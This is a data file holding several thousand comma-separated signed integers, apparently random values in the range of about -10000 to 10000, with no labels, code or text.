-7710, 7329, 7921, -3061, 1149, 9583, 8120, -1427, 3120, 8561, 5729, -5181, 8547, 6727, -8107, 5688, 
-9302, -2631, 7483, 8416, 3943, 4395, 8080, -5517, -7447, 762, -7715, -2896, -3838, 5757, -1308, -4912, -9648, 5583, -8887, -4659, 9671, 6926, -4796, 8870, 5588, 5314, -1962, -1478, 6438, 7827, -6749, 4559, 3641, -5060, 8343, 6165, 3086, 1973, 3242, 1889, 5117, 6470, 8572, -8366, 1867, -3113, -5500, 4025, -1502, 4152, -8076, -5636, -2138, -162, 8098, -6136, 9448, -906, -1816, -8774, -9790, 6679, 7069, 9563, -6867, -6256, -4922, 1065, 4517, 5287, -2666, -1447, 6990, 8955, -2361, 8697, 6432, 7442, 4382, 1965, 6359, 6359, -9101, -1940, 4482, -9840, 5150, -2799, -1229, 3986, 8013, -578, 2197, 7282, -8516, -4817, 9376, 2120, 2233, -8880, -6816, 6329, -6220, -1145, -6807, -1854, 7129, 6317, 9879, 2767, 3895, 537, 5042, 9522, 6764, -9614, -6672, 5314, -1041, -3631, -2248, -8001, -4069, -1216, -1705, -1920, 9040, 2470, -6337, -9233, 9053, -5811, -8386, 7143, 2755, 5463, -3292, -6452, 7767, 4600, 2547, 1454, 6251, 3284, -7699, 9149, -9919, 5262, -490, -539, -1428, -8935, 1240, -6536, -7254, -8526, -3281, 9671, 5315, 2761, 9022, 7307, -4222, -9195, -7785, -7783, -8730, -9261, -7744, -8937, 3970, -1893, -2217, -3712, -5829, -3198, 8817, -5122, -4534, -9029, -6612, -7877, 537, -4014, -7319, -4906, 759, 9003, 7456, -4880, 4987, -9527, 2064, -7963, 7485, 2827, -4177, 8872, 8082, -7913, 1845, -1785, -4189, 2518, 8127, 6591, 1473, -2262, 3273, 4165, -9548, -3643, 2236, -6860, -248, -5698, 5717, -9287, 6056, 3042, 4806, 4930, -9247, -3643, -9753, -4193, -6501, 1393, 4362, 1660, 6207, 9691, 3591, 6554, 2379, 8873, 3458, -9499, 2022, 3043, -1643, -1552, -2763, -4899, -9267, 4249, -2227, 3918, -6314, 6973, 5427, -5249, -4542, -2904, -5082, -2295, 6035, 1561, 6800, -5171, -2895, -9277, -4883, 4987, -9916, -3457, -9776, 3027, -2127, 9628, -7717, 5627, -3966, 5328, -5801, -2157, -8251, 2949, 1312, -1996, 5160, 2893, -1728, 6492, 8602, -1604, 6623, -4914, 9027, -162, -1172, 4931, 4132, -2122, 8803, -5470, -5062, 8718, 8556, 5376, 7532, -5933, 5643, -3173, -1733, 9040, 4979, 2883, -9060, 
-7884, -1740, -1299, -5720, -6576, -1310, -8220, -8472, 3209, -377, -1544, -457, 1651, 4273, 88, 1105, 3714, -3481, 6966, -9406, 7432, 3647, -7698, 6653, -4078, 6536, 7932, -8097, -8053, 7155, 2562, -3833, 1838, -2114, -484, -1602, 9753, -3756, -5346, 5685, -1802, 745, 3274, 1045, -2473, 4516, 2249, 8240, 7016, -3548, 4361, -1062, 2527, 5220, 3941, 6196, 5001, 7131, -6071, -2810, 6594, 7767, 4218, 1021, -6356, -5283, 9424, 3564, -392, -7755, -2453, -8632, 897, 1698, 447, 2431, -1596, 8776, 8250, 139, 6581, 8660, -3173, 8067, -7280, -6587, -771, 328, -9838, 3179, 3597, 2513, -9785, -6769, -2116, 8698, 931, -2649, -4060, -8623, -4692, -3362, 6715, 2484, 6884, -7295, 4630, -5838, -5070, 66, 4717, 9764, 7404, 9987, 5985, 1122, 1404, 6822, 9753, -5658, -7768, 6539, -8787, 3493, -4060, 2533, 1342, -5142, 4120, -6454, 6081, 1175, 8869, -2066, -8115, 4404, 1490, -2286, -8781, 8187, 4557, 8741, 1959, 1974, 2447, 9015, 1819, 1401, -6363, -5021, -1379, 1710, 5037, 1085, -3936, 7607, -6075, 940, -3256, -3608, -1416, 5318, -7030, -987, -2318, -192, -2869, -5092, 6305, -3268, 954, 7170, -5102, -4673, -329, 1192, -3791, -3983, 9709, -9260, -56, -5746, 3412, 1773, 3795, 5059, 5895, -502, 5429, -9639, 7793, -1213, 5991, 9720, 5196, -3832, -3391, 6701, -2245, -9617, -4015, 3084, 3518, -4807, 3706, -9115, -2055, 4850, 7241, 9921, 7022, -9111, 2693, -10, 4813, 6527, 5532, -9445, -8266, 3257, 5199, -2063, 7570, 4259, 9291, -1638, -841, 7821, -2976, 611, -2199, -6766, -9941, -7867, -8695, -1522, -8231, -4790, -5194, 5816, 5922, 7939, 4781, -5672, 5674, -7403, 8820, 7769, -3197, -3548, -4736, -2531, 1066, 4377, -3959, -6217, -22, -922, 6145, 2961, 8622, -9707, -2159, 5407, -8856, 7127, -9298, 1599, -5557, 6360, -1353, -1969, -2913, -3421, -7101, -2745, 2498, -6743, -5960, -1355, -3196, 5958, -5147, 5402, 6102, 773, -7004, -4955, 5592, -8218, -5345, 6365, 2556, -2650, 8495, 523, 2987, 6522, -4875, 7104, -8840, -2475, 7884, -6354, -6666, 7365, -5514, 7116, 2328, -6919, 4944, -1763, 72, 
-8899, 2712, 1124, -5947, 3772, -8235, -144, -8852, -9422, -4386, 9431, -8234, -679, 3256, -3143, -9677, -9082, -3543, -3772, -1697, -1812, -1159, -5091, 2235, -3308, 2180, 8026, -1511, 1083, -780, 2577, 6615, 418, -8271, 8093, -5517, 3653, 9473, -1977, 7045, -950, -8125, 1851, 9159, -3877, -3695, -5920, -6718, -9477, 2628, 4301, 5410, 8164, -5364, 782, 9414, 44, 7569, 4887, -4066, 4161, -458, -4649, -1130, 3360, 7576, 668, -4185, -3541, -6259, -2271, -3181, 5865, 2893, -2857, -7309, 3731, -3500, -1656, 455, -4133, -7433, -310, 1288, 3963, 9320, 5108, -9389, 6622, -472, 3827, -7395, 5161, 9099, -5401, -6474, 8698, 6034, 852, 1592, -5314, -584, 9733, 9451, 9487, -6111, 98, -6723, -1608, -4472, -3069, 6590, 8529, 9206, 3518, -8560, -1379, -9042, -9648, -105, -3170, -3308, -6208, 2124, -6470, -9434, 4551, 3071, 3269, -2906, -970, 5191, 5, 6854, 8344, -1404, -8628, -1633, -4881, -4766, -5073, 3903, 8729, 3900, -884, -5825, -5884, -9589, -806, -4306, 7292, 5157, -1497, 789, -3574, 845, -4599, 7062, 4781, 453, -2682, 7920, 8020, -286, 4919, -1978, -4102, 415, -7742, 7809, 9715, -9235, 7100, -9028, -2830, 5428, 8640, 2584, -645, -1841, -7863, -6647, -5337, 5705, 4335, -6953, -1043, 2850, -7573, -8671, 1748, -7708, 402, -2563, -388, 5888, -2625, -6006, 7951, -1758, -4384, 5501, 5023, -8573, 624, -755, -9919, 8485, -72, 3504, -4600, -977, 106, 6646, 130, 5549, 2511, -9895, -360, 7075, 8027, -4306, -4569, -9993, 9751, -6183, 2776, 5933, 6348, -1804, -9902, 7588, 6191, 3757, 2595, -3049, -800, -8961, 1457, 4207, -3163, -4300, 7335, 9402, 9807, 8879, 2398, 787, 8372, -9044, -7895, 7445, -6279, -2440, 7597, -205, 1089, 7845, -2192, 1450, 5274, 5846, -8600, -4863, -7774, 126, -8278, 4408, -5076, 776, -4999, 4789, 7797, 7742, 1564, -3637, -873, 959, 3195, -4492, 6616, -1517, -2061, 6835, -8292, -5001, 6074, 1015, -4093, 2992, -8776, 829, -8873, -1097, -8169, 5148, -9366, -7884, -3221, 3099, -8243, -8022, -9409, 975, 7955, 6844, -4219, -4505, -1474, 936, -4539, 3817, 3269, 6574, 
-8293, 242, 541, -5112, -9927, -9256, -2610, -697, -5438, -3284, -2226, 3996, 5548, -1667, -7349, 4907, 7628, -4841, 4320, 5570, 9480, -4403, -4372, -1712, 3837, -7977, -2694, 6504, -8299, -1144, -5599, 1122, 5807, 8686, 328, -2750, 6208, -9435, -814, -4744, -8790, -1263, -1145, -9207, -1714, 139, 3528, 2640, -7903, 5191, 6339, 5888, -1171, 7757, -7008, 4616, -4969, -7283, 7575, -3829, 8572, -8510, 4438, 265, -9214, -1327, -8098, 7500, -2201, 4118, -2396, -7023, 5044, -5892, -807, -9511, 3233, -9074, 6514, 8289, -411, -3693, 6914, 4240, 4649, -448, 3274, 4103, 2908, -4612, 2465, 2044, -7528, -4791, -3772, 2260, -2943, 9442, -1189, 7497, -4277, -7789, -7205, -5587, 2132, -1411, 9621, 1881, -813, -3220, -5897, -4712, 5598, -2963, -9569, 4674, -3043, -5699, 5169, 1854, 7571, -9834, -3603, 5772, 9891, -1530, -4220, 2492, -1298, -762, 5984, -8048, -8676, -736, 4604, -774, -6884, -6138, -4071, 9224, 2174, -1646, -8895, 3040, 7107, -9272, -8794, 5863, -7420, 637, -5559, -8878, 9869, 3654, -7727, -8866, 826, -6551, 7123, 2018, 3330, -269, -6405, 7880, 4113, -5749, 319, 76, 361, -7967, 2115, 7980, -3487, -8117, -2217, 5536, -5784, -7260, 6915, 9667, 421, -2786, -1337, -4370, 6867, -7202, -4097, -6126, 1424, -4889, 6790, 7584, 1828, -2540, -5842, -6509, 4369, 6576, 9878, -825, -7109, -3068, 8002, -3584, -6883, -7502, -5084, 9123, 3615, -9117, -2373, 1626, -9876, 3394, -5778, 2572, -5064, 3044, -3033, -2917, -3400, -6946, 7238, 2391, 1041, -3691, 1434, 2704, 2010, 1148, -2151, 4080, -1372, -5773, 9629, -8593, 9522, -560, 484, -8744, -9637, -2573, 1187, 1688, 2925, 6343, -4081, 207, -7583, 3965, -3757, 1726, -1505, 3073, -6933, 1609, 3328, 7883, 8615, 6676, 7655, -1649, 989, 1027, 4870, -9215, -4166, -1533, 877, -1155, 7188, 4349, -5822, -8887, 7646, 7077, -1717, -8029, -6362, -2272, 4040, -3496, 2702, -4084, 4114, 8716, -5606, 3232, 2425, 8017, -2165, 9972, 9247, 3429, -6676, 4659, 4935, -5381, 2111, 1880, -2664, 5399, 7855, -2440, -9788, 1952, 6031, -9397, -571, -5244, 
-5371, 9104, -7327, -3387, 6735, -4749, -1521, -4866, 1012, 1393, -7971, -38, -1749, 9997, 4316, 6257, 938, -6541, 5337, -7470, 4381, 779, 8804, 4107, -6014, -7414, 7201, 9549, -8028, -2718, -2504, -1429, 1632, 4620, 5873, -5494, -4056, -9314, 2857, -8806, -2802, -5694, 2115, 3400, 8540, -573, -2808, -5310, 8308, 3471, -4338, -8156, 6851, -3715, 1639, 702, 5438, -2011, -3807, -2255, -7981, -5909, -4884, -819, 6550, -432, 7330, -8390, -3886, -2278, 8441, -7177, -632, 9476, 853, -223, -4101, 7330, 6201, -6565, 1769, 9831, -5397, 1814, 2845, -3375, 2154, 2903, 7356, 3578, 3831, -1601, 1152, -1242, 7743, -9012, 8954, -5728, 7439, 8970, 4757, -9624, 7800, 7066, -1960, 5580, -4954, -8029, 2133, 7316, 9784, 8672, -3729, -6519, -2113, 4792, 7898, 4076, 4819, -9216, -1210, -188, 4938, -4470, 6582, -4418, -5744, -8076, 1021, 1624, -6414, 181, -2586, -8507, -557, 9587, -8334, 2834, -6031, 1324, -2738, 8247, 1281, 7543, -7339, -5439, 9354, -6531, 6404, 251, -8335, -4801, 4283, -6977, 5748, 1994, -8608, 6435, 8916, 3962, -7479, -6703, -2658, -1816, 2412, -8898, -7616, 4830, -6102, -1078, -5208, -4041, 3007, -5057, 5819, 819, 5734, -2293, -3820, -2721, 3053, -7132, 2988, 8592, -2160, 762, -4771, -2471, 3151, 2139, -4173, 6238, 483, -8270, -4129, 9784, 7350, -3387, -5325, 4614, 2720, -8348, 2267, -5431, 1334, -7557, 5007, 5863, 8000, -1334, 6542, 2789, -5766, -1110, -2492, 3444, -4682, -3579, 8830, 5405, 6824, 4804, -8878, -3722, 1854, 8334, 3368, 6102, -4838, -2915, 4454, -3829, -5894, 7803, -5648, 1435, 9698, 4244, -6663, 215, 8048, 5462, 9607, -7334, 1795, -3932, 768, 4839, -5268, -2968, -4274, 2802, -1131, 1280, -6614, -3977, -2768, 5961, -3555, -9280, 8040, 2369, -888, 2224, 9986, -5107, 9497, 99, -4328, 5722, 2918, 8556, 5670, -138, -4014, -439, -3529, 9533, 4844, -4585, 433, -8807, -2769, -4638, -1577, -4765, 2140, -3312, 9884, -5733, -9604, 3031, 3087, -1465, 9603, -8579, 5899, 4241, -8991, -2569, 438, 6919, 3762, 8390, 7163, 4861, 8511, -7160, -6481, -1325, 7765, 4418, 
3887, 9390, -7122, 7932, 8455, -2495, 1325, -9388, -9076, -7372, 9898, 773, -7655, -7286, 4598, 8056, -833, -3206, -2672, -2774, 9631, -3928, -3875, 2601, 6715, -3988, 2919, -4114, 8538, 7487, 1157, -9239, -1517, 9671, -9413, -5933, 8130, -9194, -6436, -705, 226, 8379, -2055, 1297, 7281, -7924, -8824, 2713, 3702, -4613, 9334, -4712, 2074, 8178, 3392, 5339, -9593, 6084, -8026, 4564, -7082, -9878, -4027, -1920, 1104, 4612, -9075, -6551, -8650, -3870, -3391, 8853, -5536, 1245, -4043, 5350, 3901, -6979, -2294, -7159, -3351, -8711, 6629, -5491, -8903, -6584, -3175, -4622, 8518, -7475, 1261, 5897, -6522, -1125, -8185, 7898, -3429, -7062, 2319, -750, -2632, -9178, -4771, 1910, -2619, -6228, 4184, 3933, 3851, 9213, -8212, 5618, -5580, 6050, 615, -6234, -1886, 706, 298, 4147, -953, -5781, 7288, 2395, -2679, -8937, 3398, 5754, 9743, -6537, -4973, -8175, 4021, 4177, -6336, 5383, -7075, 8860, -3919, 7699, -1899, -7050, 1735, -6138, 7857, -5644, 9939, -8427, -2555, -4390, 5109, 4432, -3244, -1921, -2284, -2479, 7531, -2770, -7958, 7441, 7502, 6363, 2601, -2472, -4440, -1452, -9697, 9751, -4923, 3553, -3995, 6678, 3944, 2917, 5510, -1978, -6420, 7218, -9145, 3827, -8343, 60, 6793, -7420, -1402, -2500, -889, -4884, 6483, -9377, -1745, -9807, -6656, -7908, 34, -1519, 2427, 2783, -4733, 8040, -4854, 8028, 1218, -8757, 9637, 8886, 7694, 3636, 2973, -4214, -7751, 3729, -9025, 5980, 3474, 4723, 1405, 3805, 5279, 3816, 1343, 117, -8447, -21, -6155, -5962, -6188, 4838, 7159, -4744, -9744, 2923, -230, 1585, -9692, -6433, -775, 4613, 1038, -1210, -1776, 4983, -4243, 4937, 5044, -1375, -2562, -7649, -2755, 6024, 4098, 4732, -9722, -4424, -7972, -4946, -2272, -719, 2204, 6212, 8199, -1601, 7599, -5750, -5980, -4287, 7666, -9826, 6918, 4332, -3609, -440, -5357, -481, -3896, 4343, -2219, -9273, 1814, -2397, -2773, 8121, 1773, -5303, 6791, 3254, -5606, 1810, -1940, 2786, -9434, 1837, 9639, -1312, 6032, 6809, -1878, 9861, 5723, 7121, 6269, -9527, 3267, -4728, 7163, 5882, -4791, 8941, 7874, 
-9125, -1401, -417, 8777, 1657, 8903, 5, 4363, 4942, -9971, 9806, -111, 6385, -6078, 5015, 9671, 8662, 1690, -6777, 503, -9721, 830, -7672, 9303, 83, 3015, -3055, 7919, -8145, 5970, 9503, -1807, 6756, -6187, -3530, 4778, 9642, -8537, -4088, -5923, -5136, -3785, 2012, -832, -9254, 1704, -3419, -2229, 5786, -7175, -5874, -6129, 1324, -222, -2869, -1915, 6295, 4424, 5524, 4942, -1511, -1435, -602, 7595, 5905, 4498, -6601, -1261, -9803, -981, 2090, -2261, -6212, -4962, -1769, 9252, -8521, -3863, -1956, -8541, 2846, 4973, -6644, 8182, -598, -9579, 4380, -3339, -2687, -9218, 4017, 457, 8641, 1172, -1157, 1362, 7577, 1487, 326, 4140, -5969, -7046, 6451, -6676, 1280, -3, 1768, -9373, -4361, -4795, 6056, -3664, 6504, -9632, 5433, 7050, 6800, -5473, -3621, -2669, -5474, 915, -3492, 8203, 844, 4567, -9059, -6053, -9674, -243, 639, -1489, -5063, -5454, 4975, -3936, -5630, -117, -3737, -1176, -4685, -3987, 9947, 9287, 14, 5106, -4664, 2414, -442, -5987, 3624, -8406, 208, 8594, 1193, 1317, 4037, 3355, -8596, 6230, -2231, -3024, 667, -8249, 8061, -278, -3210, -2140, -9366, 3775, -7244, 6161, 5368, -2660, 655, 3515, 8472, 3205, 7550, -7320, -3572, -3306, 8389, 7513, 5860, -2543, -2933, 8286, -6722, -5583, 5778, 6311, -3706, -8597, -3970, 626, 9611, -6574, 631, 1014, 5659, 6033, -2478, 23, 1340, 3547, 7001, 643, -6435, 2758, 6088, -8421, 6714, -1803, 9982, 3762, 6451, -1937, -7965, 1627, -6347, 8547, 5398, 6892, 6816, 4436, -3140, -2277, -4478, -1317, -8835, -307, -7339, -6453, 9715, 9391, 5897, 4252, 4856, 5548, -6603, 9605, 9913, -8543, -242, 150, 2698, -2262, 4938, -2452, 8697, 7727, 8022, -4276, -664, -6696, -7112, 6051, 3038, -3003, -8825, -9338, 6950, 3927, -6918, 5761, -8817, 5974, 7860, 1458, -479, -5618, -9465, -3168, 3163, 8415, -1682, -5284, 845, 835, -5827, -3395, 7634, 9223, 999, 5972, 8895, 648, 3977, 9779, -1832, -2665, -2566, 4607, 2454, -5879, 8547, -6776, 1669, -6164, 8055, -4994, 2322, -6050, -1670, 65, -4114, -2902, 5786, 3370, -5064, 4298, 3664, -41, -5021, 
2133, -1172, -7726, 725, -6277, 7990, -3177, 4316, -9855, -846, -5256, 5459, -2773, -3171, -5767, 1507, -6079, 7573, 4745, 5526, -280, 5369, -5506, -6680, 7257, 8911, 9127, 1842, -6516, 226, -6390, -9808, -7292, -1352, 2096, -904, 8916, 6323, -4932, -7642, -1756, -5054, -3288, 3517, -8422, -7629, 6478, -8291, -3297, 294, 5761, -2906, -7109, -6775, 5544, -5208, 4020, 409, 4612, 5495, -3791, 2909, 810, -8817, -8281, 9311, -1241, 6284, -5280, -2534, 1390, 5283, 7170, -7639, -8296, -8424, -3567, 7347, 2075, -5791, -5846, 5815, -4441, -1872, 8985, 5783, 9305, 4831, 174, -8715, 168, 3925, -7852, 3695, 1647, 1204, -8558, 4889, 7211, 1478, -1344, 4086, -7430, -9324, 989, -3832, -4810, 92, 7777, 3848, -2659, -8520, -793, 5116, 8874, 8206, 3073, -36, -8789, -1313, 7759, -5603, 1547, 678, -4831, -8810, -7087, 8797, -862, -6858, 3929, -856, 5863, -2881, 7105, 7100, -652, 1072, 7087, 6048, -472, 6471, -6434, 4376, -5279, 2188, 4169, 8262, -9700, 1530, -4144, 4092, 1098, -2444, -6742, -8306, -6563, 4560, -9422, 7356, 846, -4711, 236, -856, 7217, -5948, -7190, 8262, 828, 4401, 8822, 2776, 5720, 2882, 5004, 8201, 9927, 3499, -7529, -3141, -985, -2293, 3204, 1268, -1458, -5325, 7763, 232, -8972, -5708, 1545, -3251, 7119, -8960, -5594, -3319, 8239, -3047, 238, -6500, 2281, 6828, 742, 8131, 3484, 6437, 9485, -9942, -7783, 4495, -4231, 55, -9291, -4309, 7843, -5867, -8653, -8150, 9386, 8548, -716, 5884, -6807, 6750, -1441, 6923, 8114, -9047, -258, -8696, -301, 6226, -6612, 459, -292, 4259, 11, 431, -7535, -7861, -6943, 1459, 7047, -6268, 4826, -4211, -9154, -5254, -804, -8085, -7041, 331, 5702, 6288, -5678, -7374, 4819, 3800, 1592, 9415, 3035, -3841, -1477, 4994, -2779, 7520, 4055, -6519, 2704, -2868, -6305, -3237, -6061, 9534, -1840, -7586, 9608, 6815, 4478, -3914, -5506, 4702, 1668, -9386, 779, -7707, 1594, 5768, -7956, 4310, 311, -1994, -4373, 936, -5550, 1144, 5751, 1069, -1783, 1183, 3782, 5606, 9508, -3873, 7979, -834, 3323, 8971, -3059, 7166, 4465, 4517, -838, 6139, 9381, 
-9488, -107, -6941, -8699, 2360, 7772, -3805, 5823, 7637, 395, 9517, 8571, -639, 2453, -8960, 3606, -1694, -3328, 3925, -9985, -8335, -1357, -5634, -663, -6077, -6454, -990, 2931, 8601, -218, -2881, -3755, -4400, -6105, -5945, 5255, 9332, -6506, 1950, -5223, 2751, 4265, -7682, -4512, -1017, 5495, -4952, 7110, -5956, -3637, -209, 8641, -5845, -7615, -9889, 3859, -381, -9712, -9688, -3565, -9825, -686, -6709, 9230, 7663, -9930, -4948, 4501, -5151, -5547, 488, -4625, 9936, -2860, 5498, -6261, -3231, 2798, -7107, 5575, -3951, 4288, 9514, 4914, -5633, 3070, 4237, 6075, -2665, 8039, -8665, -4764, -1801, 6798, -9915, 4799, -6368, -6304, -9876, -3878, 8372, 7121, 717, -3902, 5078, 2196, -993, -3773, 6398, 8144, 4247, 7422, -5833, 9009, -9668, 9066, -1181, 7056, -6282, -7992, -1385, 2162, -9952, -7423, -9546, 2451, 3795, 2285, 3409, 8454, 7607, -2413, 5677, 4551, -6343, 6115, 9000, -1086, -5231, -9012, -5562, -3487, 8366, 6869, 4647, -1857, 3864, 2336, 6867, 7066, 9808, 2184, 3542, 5578, -3092, 3545, 8343, 3670, -7189, -1699, 309, -8796, 5285, -6929, 3024, 1300, 1092, -6158, -2807, 340, 6769, 1830, 2161, 7726, -7667, -2124, -4399, -8613, 5491, 491, -3036, 2783, 953, -8317, -1880, -871, -2010, 79, -8949, 9588, 4536, 8390, 5317, -9356, 4993, 1633, 3305, -5728, 7720, -5412, -5651, -6101, 2156, 3481, 4450, 6594, -9728, -8325, 3504, -858, 1476, 3845, 3299, 8573, 7526, -7477, -232, -2100, 4349, -140, -5552, -2954, -6636, -4914, -4596, -4726, -6225, 5718, 7915, 2188, 9075, -6678, 2893, -3272, -9372, -8184, 6123, 7627, -6207, 5447, -7912, -4261, 2730, 4913, 9446, -7098, 8408, -5863, -5349, 2284, -1522, -5024, 9142, 499, -456, -933, -1528, -9803, -7624, -2546, 9244, -8132, -8419, -2017, -3190, -9323, 5236, -7775, 8966, 2953, 5421, 7185, -9684, 3167, -1807, 653, 5263, 7954, 2821, 6921, 5419, 6670, 9913, -6208, 204, 9442, -656, -5308, 8513, -2461, -2829, 7554, 1354, -6438, -3820, -1, -2640, 3493, -7718, 3932, 5508, -3017, -8748, -6112, -5211, 8627, -3249, 3302, 9165, -2706, -4966, 
-7479, 6783, -2608, 4451, 3159, 1092, -920, -5387, 2607, 7944, -6392, -174, 3269, 8388, -5739, -1747, 675, 5841, -2342, 3524, -2623, 2457, -8866, 7504, -2868, 5324, -9085, -6270, 4317, 1156, 8167, -73, 4796, -3394, 2129, 7666, 6626, -5175, 28, -8879, 9403, 8620, 6996, 5163, -3451, -7146, -903, 4908, 4344, 342, -8343, 5399, 5550, -3560, -4212, 151, -3606, 9328, 8802, 5657, -8026, -3585, 9623, 7169, 1928, -3909, -746, 5784, -1113, 6275, 4696, 3478, -2881, -5076, 2939, -9850, -5210, 608, -9209, -9192, 7533, -5765, -402, 2340, -4368, -3700, -2185, -9859, 979, -2506, 4223, 9155, -183, 9381, -5233, 5180, 9070, -9482, 3179, -1365, 884, -863, 375, 1091, 4780, 1014, 5663, 1754, 8525, 1796, -8154, 9453, 528, -1195, 7690, -5900, -555, 2949, 1001, 1552, -4111, 3033, 3389, -6475, 4422, 9813, 9178, 4667, 9804, -3985, -1412, -24, 3238, 9146, -2099, 1462, 1136, -7352, -7808, -9232, -943, 4731, 3562, -7907, -8498, -1467, 3602, 2401, 2416, 4347, 964, -3641, -7753, 3681, 8043, 8894, -6863, -7012, -5603, 9009, -5854, -8204, 8228, 5075, 5077, 677, 5185, -7573, 4517, -952, 8862, 5379, -6868, 9808, 1235, 6320, 6899, 9122, -4946, 8756, 3722, -9757, -6365, -2958, 4786, -8905, -7500, -5483, 3647, 7389, 5268, 7975, -247, 8838, 1500, 9413, -5397, 4406, 8618, -1329, 5542, -2466, -3879, 2092, 9811, -7804, -6850, 7790, -2062, -6053, -1135, 7894, 3670, 8872, -5969, -3204, -7945, -4783, 9851, 1843, 8794, 3535, 5663, 7298, -1560, 9727, -3959, -4045, 1401, -2754, 8398, -1044, 3326, -7854, -2829, -5558, -2050, 7722, 9214, 1359, -6328, -372, 9308, 7215, 2669, -7351, 3798, -6851, 6072, -6229, 872, 5880, -9865, -9079, 4377, -7991, 1275, -8027, 8815, -9187, 6492, 1900, 1009, 9725, 7644, 2573, 5405, -313, -8662, -1817, 609, -8661, 1278, -1922, -9443, 8554, -4204, -548, -7773, -4325, -4443, 1242, 2145, -5166, 8778, 1946, 8596, -220, -6247, -9096, 4267, 3871, 4603, -5293, 9596, 8401, 5543, 1408, 3951, -2670, -9325, -340, 5208, -6731, 9223, -1870, -6003, -8793, -6631, 8508, -1139, -7459, 6979, -5157, 3503, 
-9955, 6774, -3355, -3599, -3010, 6051, 6392, -3228, 3626, 7382, -3143, -7397, -6118, 3282, -7304, -8512, 6147, -599, 347, 3202, -5852, 9142, -8815, 1740, 5232, -1382, -6868, 6479, 1259, -7196, 485, 2337, 8072, 4281, -3937, 6323, -7924, 3038, 7000, 8371, -6756, -6689, 6448, -5322, 3158, -9291, 1169, 9924, 8150, 4424, 9285, -5219, -19, -282, -8531, 2707, 9348, -8237, -4790, 4434, -4716, 5328, -3799, 4465, -8380, -3611, -3770, 7889, -7786, -4365, -5544, 4127, 9903, 2114, 6215, -6150, -6913, -6340, 2892, 9948, 3286, -8516, -3021, -8849, 1293, 8526, -8839, 3772, -2117, 4759, -5317, -271, 1816, -4799, -957, 7628, -9955, 4913, 3434, 6778, -3900, -5307, -877, -7566, 924, -9166, -7177, 3878, 4473, -2467, -7849, 6199, 5902, 1831, 9793, 2856, -1808, -3099, -1615, -4158, 8747, -8629, 8921, -4517, 8707, 8408, 5234, 3948, 3903, 7364, 4732, -6630, 1484, 125, 5329, 3510, 2904, -6482, 8500, -8953, -3754, -9024, -5596, -7573, -7744, -9969, 3167, -8497, -4805, -7828, 5145, 1940, -6914, -441, 5616, -4491, -8188, -9323, -9839, -8761, -5830, 7281, -1233, 1896, -3954, 9407, -2787, -9785, 6843, -8582, -536, 7121, 2673, 4292, 6186, 3141, -2208, 3954, 79, 1406, 8847, -3350, -8958, -8893, -5613, 7189, 5936, 5542, -5604, -7970, -3415, -390, -6524, -4334, -1870, 6832, -4192, 5343, 4447, 7673, 9875, -2282, 1001, -5242, -4, -4488, -2291, -7930, -1054, 7163, 8454, -1208, -4279, 6609, -3883, 8143, -4281, 2420, -9558, -9460, 6663, 1815, 9051, -9305, 1297, 1917, -504, -5533, -9730, -9434, 7371, 1214, -6913, 7904, 1940, -3485, 3952, 3777, 1983, 6059, 4208, 3617, 4653, -2306, -8567, 4583, 4977, 2445, 8807, 5133, -9615, -9749, 798, 1856, -1980, -6647, 7664, 2265, 4550, -6561, -6583, -2816, 5964, -9430, -7259, -4231, -8519, 7387, -7366, -7485, -5434, -5175, 6474, -4638, -5632, 1021, 2204, -5034, 9098, 1431, -2845, -6660, 359, -8503, 334, 6618, -7534, -939, 1969, 6729, -5124, 6175, -3600, -8914, -8413, -7061, -9458, -1303, -8502, -613, -8335, -5334, 9133, -1043, -4607, -268, -3002, 1924, -6943, 4222, 
-2122, 1125, -2953, -6396, -3008, 8028, -1256, -3652, -1609, 8631, -2612, 2385, 5291, -1530, -173, 7908, -8355, -8859, 4019, -6190, 1433, -6701, -9588, -2619, 2824, 7177, 4415, -6531, -3460, 2271, -9227, 1261, -9302, 5177, 2005, -8522, 4520, 9373, 6974, 9108, 5382, -7215, 7563, -1910, 6309, -3029, 9618, -3919, -2205, -8091, 1419, -2302, -4092, 579, -5348, -405, -4372, 9013, 41, 1000, 2645, -5178, -6943, 3269, -1955, -3524, -3536, 8013, 3269, -4513, -9606, -4930, -8645, 8258, -11, 3051, 3143, -8734, -4373, 8827, -8630, 8018, -6479, -2598, -2355, -9452, -4263, 257, -9627, -919, 5537, 1716, 9855, 2567, -7735, 9540, 2202, 9724, -3153, 4819, 6690, -5276, 1944, -4415, -2440, -5044, 2460, 4559, 1520, 8844, 9962, -4210, 2844, -9740, -8701, 122, -2382, 9419, -4609, -5731, 5073, -3014, 1099, 776, -9397, 4907, 7471, 8148, 4540, -6166, -7036, -5996, 6336, 7594, 6453, 1865, 4067, -9354, 712, -8416, 6074, -2024, -936, -2549, 7926, 4509, 417, -555, -3294, 3611, 87, -3743, 5239, 7255, -5812, 6454, -7649, -8377, -133, 9274, -7438, -7259, 6502, -4532, -3586, -2774, -6451, 1793, 1740, 7568, -547, 879, -33, 2674, -9786, -8204, -8467, -2969, -3313, -5350, 5689, -9788, 9511, 7828, 5255, 17, 1309, 4061, 8051, -7075, 1250, -9229, -4101, 412, 9952, 5880, 2694, -3671, -4187, 6926, -4728, 2215, 6150, 3664, -6795, 8387, -718, 9550, 5850, 2127, -2045, 9954, 3818, -5564, 7783, -7697, 6033, 2237, 6137, 2764, -3049, 5874, -1441, 3315, 3771, -8409, 9670, 7236, -4831, 2415, -3721, 3144, 9369, 8179, -3727, 3420, 5698, -729, 2999, 8422, 6111, -7872, 3031, -3705, -6980, -6709, 8413, -2913, 2529, 8298, 8840, 9783, 587, -2511, -8871, -944, -1635, 4404, 8895, 1064, -6263, 4243, -4825, -8811, -4283, -9184, -8905, 9165, -969, -7456, -3050, 5859, 2559, -9927, -4162, 6335, -395, 8091, 7767, 8175, -7334, -669, -6592, 7087, 4907, 6708, 3675, -5721, 9023, -9419, 989, -3814, 7848, -5745, 5800, 8624, -5467, -6207, -6315, -8963, 4466, -171, 7433, 1112, 8149, -9305, 383, -598, -444, 1910, -7936, 981, -1183, -4230, 
